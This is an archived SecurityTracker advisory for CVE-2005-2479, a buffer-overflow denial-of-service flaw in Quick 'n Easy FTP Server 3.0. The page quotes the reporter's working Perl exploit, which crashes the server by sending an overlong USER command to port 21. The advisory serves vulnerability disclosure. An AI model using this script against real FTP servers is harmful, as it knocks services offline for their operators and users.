SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Quick 'n Easy FTP Server Vendors:   Pablo Software Solutions
Quick 'n Easy FTP Server Input Validation Bug in USER Command Lets Remote Users Deny Service
SecurityTracker Alert ID:  1014615
SecurityTracker URL:  http://securitytracker.com/id/1014615
CVE Reference:   CVE-2005-2479   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 3 2005
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 3.0
Description:   A vulnerability was reported in Quick 'n Easy FTP Server. A remote user can crash the FTP service.

The FTP service does not properly validate user-supplied commands. A remote user can supply a specially crafted USER command argument of approximately 1024 characters to cause the target FTP service to crash.

matiteman reported this vulnerability.

Impact:   A remote user can cause the FTP service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_server.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow

Details:
========

Input to the user commands is not properly checked

and/or filtered. Issuing a long argument to the user (about 1024 caracteres)

commands will cause the corresponding process to die without any error message.

this vulnerabilities exist in both the professionnal version 3.0 and lite version 3.0



Exploits:
========

Run the following PERL script against the server. The corresponding

process will die.



#=====testserver.pl =====

#

# Usage: testserver.pl <ip>

# testserver.pl 127.0.0.1

# bug discovered by : matiteman

# exploit coded by : matiteman

# thanks to : Reed Arvin (peachfuzz)

# Quick 'n Easy FTP Server 3.0 (pro and lite)

# Download:

# http://www.pablosoftwaresolutions.com/

#

##########################################



use IO::Socket;

use strict;



my($socket) = "";



if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "21",

Proto => "TCP"))

{

print "Attempting to kill Quick 'n Easy FTP Server 3.0 (pro / lite) at $ARGV[0]:21...\n";



sleep(1);



print $socket "user " . "A" x 1024 . "\r\n";



sleep(1);



close($socket);

}

else

{

print "Cannot connect to $ARGV[0]:21\n";

}

#===== testserver.pl =====

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC